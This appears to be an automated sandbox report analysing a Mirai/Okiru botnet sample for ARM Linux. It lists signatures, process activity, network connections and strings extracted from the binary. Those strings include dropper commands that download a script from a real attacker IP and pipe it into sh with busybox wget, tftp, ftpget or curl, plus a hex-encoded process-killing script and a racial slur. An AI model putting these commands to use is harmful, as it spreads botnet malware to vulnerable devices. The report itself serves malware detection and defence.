Edit tour

Linux Analysis Report
arm5.nn-20241218-0633.elf

Overview

General Information

Sample name:	arm5.nn-20241218-0633.elf
Analysis ID:	1577153
MD5:	22ad871042ce032b7225a4f11f1d3f86
SHA1:	f68d2d02fb6df23061174bd38324d8895a73ddbe
SHA256:	1daa64d77d6383023899ac2eeeb00fe93ed821cdfcf01bf829c3ed5fe2e20bf5
Tags:	user-elfdigest
Infos:

Detection

Mirai, Okiru

Score:	76
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected Mirai

Yara detected Okiru

Sample deletes itself

Detected TCP or UDP traffic on non-standard ports

Enumerates processes within the "proc" file system

Executes the "rm" command used to delete files or directories

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Sample listens on a socket

Sample tries to kill a process (SIGKILL)

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Uses the "uname" system call to query kernel version information (possible evasion)

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1577153
Start date and time:	2024-12-18 07:36:39 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 34s
Hypervisor based Inspection enabled:	false
Report type:	light
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	arm5.nn-20241218-0633.elf
Detection:	MAL
Classification:	mal76.troj.evad.linELF@0/2@0/0

Warnings

Report size exceeded maximum capacity and may have missing network information.
TCP Packets have been reduced to 100

Runtime Messages

Command:	/tmp/arm5.nn-20241218-0633.elf
PID:	6208
Exit Code:	139
Exit Code Info:	SIGSEGV (11) Segmentation fault invalid memory reference
Killed:	False
Standard Output:
Standard Error:	qemu: uncaught target signal 11 (Segmentation fault) - core dumped

Process Tree

system is lnxubuntu20

dash New Fork (PID: 6195, Parent: 4334)

rm (PID: 6195, Parent: 4334, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.2Vk4GHUvv3 /tmp/tmp.AyMCUiGuNP /tmp/tmp.0eZyUHHcgu

dash New Fork (PID: 6196, Parent: 4334)

rm (PID: 6196, Parent: 4334, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.2Vk4GHUvv3 /tmp/tmp.AyMCUiGuNP /tmp/tmp.0eZyUHHcgu

arm5.nn-20241218-0633.elf (PID: 6208, Parent: 6121, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm5.nn-20241218-0633.elf

arm5.nn-20241218-0633.elf New Fork (PID: 6233, Parent: 6208)

arm5.nn-20241218-0633.elf New Fork (PID: 6235, Parent: 6233)

arm5.nn-20241218-0633.elf New Fork (PID: 6236, Parent: 6233)

arm5.nn-20241218-0633.elf New Fork (PID: 6238, Parent: 6233)

udisksd New Fork (PID: 6219, Parent: 799)

dumpe2fs (PID: 6219, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 6298, Parent: 799)

dumpe2fs (PID: 6298, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 6299, Parent: 799)

dumpe2fs (PID: 6299, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

gnome-session-binary New Fork (PID: 6331, Parent: 1477)

sh (PID: 6331, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping

gsd-housekeeping (PID: 6331, Parent: 1477, MD5: b55f3394a84976ddb92a2915e5d76914) Arguments: /usr/libexec/gsd-housekeeping

udisksd New Fork (PID: 6332, Parent: 799)

dumpe2fs (PID: 6332, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 6336, Parent: 799)

dumpe2fs (PID: 6336, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
arm5.nn-20241218-0633.elf	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
arm5.nn-20241218-0633.elf	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security

Memory Dumps

Source	Rule	Description	Author
6208.1.00007fe574017000.00007fe574031000.r-x.sdmp	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
6208.1.00007fe574017000.00007fe574031000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
Process Memory Space: arm5.nn-20241218-0633.elf PID: 6208	JoeSecurity_Okiru	Yara detected Okiru	Joe Security

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: arm5.nn-20241218-0633.elf

Avira: detected

Multi AV Scanner detection for submitted file

Source: arm5.nn-20241218-0633.elf	Virustotal: Detection: 36%			Perma Link
Source: arm5.nn-20241218-0633.elf	ReversingLabs: Detection: 47%

Source: arm5.nn-20241218-0633.elf	String: getinfo xxxTSource Engine QueryNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe..%s/%s/proc//data/local/tmp//var/run/home/usr/bin/dev/dev/mnt/var/tmptmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/shFound And Killed Process: PID=%d, Realpath=%s487154914<146<2surf2/proc/%d/exe/ /./fd/socket/proc/%d/mountinfo/usr/lib/systemd//usr/sbin//usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd*deamon/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesnanonvimvimgdbpkillkillallapt/bin/login94.156.227.234malloc[start_pid_hopping] Failed to clone: %s
Source: arm5.nn-20241218-0633.elf	String: incorrectinvalidbadwrongfaildeniederrorretryenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http://94.156.227.233/lol.sh -O- \| sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- \| sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- \| sh94.156.227.233GET /dlr. HTTP/1.0

Source: global traffic	TCP traffic: 192.168.2.23:60004 -> 94.156.227.234:38242
Source: global traffic	TCP traffic: 192.168.2.23:38984 -> 154.216.19.139:199

Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6208)

Socket: 0.0.0.0:38242

Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 35.66.122.149
Source: unknown	TCP traffic detected without corresponding DNS query: 99.150.118.215
Source: unknown	TCP traffic detected without corresponding DNS query: 86.127.229.186
Source: unknown	TCP traffic detected without corresponding DNS query: 3.40.78.144
Source: unknown	TCP traffic detected without corresponding DNS query: 189.56.160.159
Source: unknown	TCP traffic detected without corresponding DNS query: 105.160.132.68
Source: unknown	TCP traffic detected without corresponding DNS query: 2.169.136.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.52.149.113
Source: unknown	TCP traffic detected without corresponding DNS query: 61.225.6.238
Source: unknown	TCP traffic detected without corresponding DNS query: 83.46.38.208
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 47.32.224.73
Source: unknown	TCP traffic detected without corresponding DNS query: 151.160.49.197
Source: unknown	TCP traffic detected without corresponding DNS query: 62.248.23.59
Source: unknown	TCP traffic detected without corresponding DNS query: 109.226.127.100
Source: unknown	TCP traffic detected without corresponding DNS query: 112.209.69.234
Source: unknown	TCP traffic detected without corresponding DNS query: 50.30.76.172
Source: unknown	TCP traffic detected without corresponding DNS query: 53.223.207.183
Source: unknown	TCP traffic detected without corresponding DNS query: 211.61.85.120
Source: unknown	TCP traffic detected without corresponding DNS query: 189.230.121.152
Source: unknown	TCP traffic detected without corresponding DNS query: 56.203.8.134
Source: unknown	TCP traffic detected without corresponding DNS query: 203.16.172.246
Source: unknown	TCP traffic detected without corresponding DNS query: 68.63.161.215
Source: unknown	TCP traffic detected without corresponding DNS query: 155.181.154.10
Source: unknown	TCP traffic detected without corresponding DNS query: 133.73.42.97
Source: unknown	TCP traffic detected without corresponding DNS query: 1.191.54.203
Source: unknown	TCP traffic detected without corresponding DNS query: 5.79.150.34
Source: unknown	TCP traffic detected without corresponding DNS query: 93.32.85.212
Source: unknown	TCP traffic detected without corresponding DNS query: 40.87.83.172
Source: unknown	TCP traffic detected without corresponding DNS query: 215.184.182.92
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 35.66.122.149
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 53.63.103.104
Source: unknown	TCP traffic detected without corresponding DNS query: 2.214.26.236
Source: unknown	TCP traffic detected without corresponding DNS query: 172.184.53.11
Source: unknown	TCP traffic detected without corresponding DNS query: 6.109.155.200
Source: unknown	TCP traffic detected without corresponding DNS query: 190.89.149.23
Source: unknown	TCP traffic detected without corresponding DNS query: 119.108.24.247
Source: unknown	TCP traffic detected without corresponding DNS query: 99.150.118.215
Source: unknown	TCP traffic detected without corresponding DNS query: 135.212.53.41
Source: unknown	TCP traffic detected without corresponding DNS query: 34.219.206.237
Source: unknown	TCP traffic detected without corresponding DNS query: 50.36.117.21
Source: unknown	TCP traffic detected without corresponding DNS query: 186.75.203.110
Source: unknown	TCP traffic detected without corresponding DNS query: 204.184.19.14
Source: unknown	TCP traffic detected without corresponding DNS query: 143.91.117.105
Source: unknown	TCP traffic detected without corresponding DNS query: 159.129.114.210
Source: unknown	TCP traffic detected without corresponding DNS query: 182.83.41.0

Source: arm5.nn-20241218-0633.elf	String found in binary or memory: http://94.156.227.233/
Source: arm5.nn-20241218-0633.elf	String found in binary or memory: http://94.156.227.233/curl.sh
Source: arm5.nn-20241218-0633.elf	String found in binary or memory: http://94.156.227.233/lol.sh
Source: arm5.nn-20241218-0633.elf	String found in binary or memory: http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: getinfo xxxTSource Engine QueryNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe..%s/%s/proc//data/local/tmp//var/run/home/usr/bin/dev/dev/mnt/var/tmptmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/shFound And Killed Process: PID=%d, Realpath=%s487154914<146<2surf2/proc/%d/exe/ /./fd/socket/proc/%d/mountinfo/usr/lib/systemd//usr/sbin//usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd*deamon/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahi
Source: Initial sample	String containing 'busybox' found: usage: busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox hostname PBOC
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample	String containing 'busybox' found: /bin/busybox wget http://94.156.227.233/lol.sh -O- \| sh;
Source: Initial sample	String containing 'busybox' found: /bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- \| sh;
Source: Initial sample	String containing 'busybox' found: /bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;
Source: Initial sample	String containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
Source: Initial sample	String containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http://94.156.227.233/lol.sh -O- \| sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- \| sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- \| sh94.156.227.233GET /dlr. HTTP/1.0
Source: Initial sample	String containing 'busybox' found: > .d/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrepThe Gorilla/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4T

Source: ELF static info symbol of initial sample

.symtab present: no

Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6238)	SIGKILL sent: pid: 788, result: successful
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6238)	SIGKILL sent: pid: 884, result: successful
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6238)	SIGKILL sent: pid: 1664, result: successful
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6238)	SIGKILL sent: pid: 2096, result: successful
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6238)	SIGKILL sent: pid: 2102, result: successful
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6238)	SIGKILL sent: pid: 6301, result: successful
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6238)	SIGKILL sent: pid: 6331, result: successful

Source: classification engine

Classification label: mal76.troj.evad.linELF@0/2@0/0

Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/6298/status
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/6034/cmdline
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/6331/status
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/6311/status
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/6377/status
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/6299/status
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/6310/status
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/6376/status
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/6379/status
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/6312/status
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/6378/status
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/6391/status
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/6390/status
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/6392/status
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/1477/cmdline
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/799/cmdline
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/6304/status
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/6303/status
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/6306/status
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/6305/status
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/6308/status
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/6307/status
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/6309/status
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/6384/status
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/6383/status
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/6386/status
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/6385/status
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/6300/status
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/6388/status
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/6387/status
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/6302/status
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/6301/status
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/6389/status
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/6380/status
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/6382/status
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/6381/status
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/1/cmdline
Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6236)	File opened: /proc/6336/status

Source: /usr/bin/dash (PID: 6195)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.2Vk4GHUvv3 /tmp/tmp.AyMCUiGuNP /tmp/tmp.0eZyUHHcgu
Source: /usr/bin/dash (PID: 6196)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.2Vk4GHUvv3 /tmp/tmp.AyMCUiGuNP /tmp/tmp.0eZyUHHcgu

Hooking and other Techniques for Hiding and Protection

Sample deletes itself

Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6208)

File: /tmp/arm5.nn-20241218-0633.elf

Jump to behavior

Source: /tmp/arm5.nn-20241218-0633.elf (PID: 6208)

Queries kernel information via 'uname':

Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: 1/usr/bin/x86_64-linux-gnu-c++filt!/usr/bin/sha256sum1/usr/bin/ssh-import-id-lp0!/usr/bin/qemu-ppc64!/usr/bin/xsp41/usr/bin/twist3/arm/sr10!/usr/bin/piconv0!/usr/bin/xsetroot!/usr/bin/POST/arm/usr!/usr/bin/byobu-statussr1/usr/bin/vmware-vmblock-fuse
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-microblazeel
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: U/arm/10!/usr/bin/sswap01/usr/bin/vmware-vgauth-cmd`!/usr/bin/foo2zjs1
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-sparc32plus
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-riscv32
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mips64el
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: !/usr/bin/[0!/usr/bin/fwupdagent1/usr/bin/qemu-mips64el10!/usr/bin/script0!/usr/bin/readlink1/usr/bin/sg_emc_trespass
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /arm/usr/bin/qemu-microblazeel
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: !/usr/bin/busctl0!/usr/bin/preunzip1/usr/bin/vmware-hgfsclient0!/usr/bin/infobrowser!/usr/bin/setterm1/usr/bin/l2ping/arm/sr10!/usr/bin/byobu-layout!/usr/bin/bzcat!/usr/bin/sg_rmsnarm/usr1/usr/bin/kill/arm/sr10!/usr/bin/fuser01/usr/bin/showconsolefont`!/usr/bin/macpack1
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/vmtoolsd
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: U1/usr/bin/systemd-escape/bin/ed0!/usr/bin/qemu-or1k!/usr/bin/colormgr
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-alpha
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-s390x
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-sh4eb
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/vmware-hgfsclient
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: U/arm/sr10 /usr/bin/lessecho!/usr/bin/ucs2any1/usr/bin/poff/arm/sr10!/usr/bin/pdb3.80!/usr/bin/koi8rxterm1/usr/bin/setupconrm/sr10!/usr/bin/lowriter!/usr/bin/qemu-riscv321/usr/bin/aproposarm/sr10!/usr/bin/mkfontscale!/usr/bin/jsondiff1/usr/bin/xfce4-screensaver-command!/usr/bin/xfce4-dict!/usr/bin/man-recode1/usr/bin/xfce4-screenshooter
Source: arm5.nn-20241218-0633.elf, 6208.1.00007ffe1f4cf000.00007ffe1f4f0000.rw-.sdmp	Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: U/arm/sr10 /usr/bin/alsamixer!/usr/bin/pinentry-x111/usr/bin/sg_syncarm/10!/usr/bin/ps2txt0!/usr/bin/sg_prevent!/usr/bin/vmware-checkvmQ
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: U/arm/sr10 /usr/bin/scanimage!/usr/bin/menulibre1/usr/bin/foo2lava-wrapper0!/usr/bin/ipcs0!/usr/bin/fold1/usr/bin/zdiff/arm/sr10!/usr/bin/dtd2rng!/usr/bin/permview1/usr/bin/sg_senddiagsr10!/usr/bin/qemu-xtensaeb!/usr/bin/ppdc!/usr/bin/perlivparm/usr!/usr/bin/wall/arm/usr1/usr/bin/x86_64-linux-gnu-ld.gold
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-aarch64
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: P0/usr/bin/blueman-assistant`!/usr/bin/lzmore!/usr/bin/racc2.7arm/usr1/usr/bin/xfce4-popup-notes0!/usr/bin/inxi!/usr/bin/monodocs2htmlr1/usr/bin/gnome-extensions0!/usr/bin/glxdemo!/usr/bin/lzcmp/arm/usr1/usr/bin/gst-launch-1.00!/usr/bin/xflock4!/usr/bin/pkactionrm/usr1/usr/bin/systemd-cat0!/usr/bin/vimdiff!/usr/bin/qemu-ppcrm/usr1/usr/bin/btrfs-select-super0!/usr/bin/bunzip2!/usr/bin/listresarm/usr1/usr/bin/gipddecode/0!/usr/bin/pod2text!/usr/bin/xzfgreparm/usr1/usr/bin/git-upload-archive01/usr/bin/gnome-session-quit
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-sh4
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: !/usr/bin/spd-say!/usr/bin/psfgettable1/usr/bin/debconf-apt-progress0!/usr/bin/transset!/usr/bin/expr!/usr/bin/pdfdetachm/usr1/usr/bin/lightdm-gtk-greeter-settings!/usr/bin/col701/usr/bin/vmware-xferlogs`!/usr/bin/byobu-screen1/usr/bin/byobu-launchsr10!/usr/bin/loimpress!/usr/bin/print1 @
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /arm/usr/bin/vmware-vmblock-fuse
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-nios2
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm/var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-llmWagq
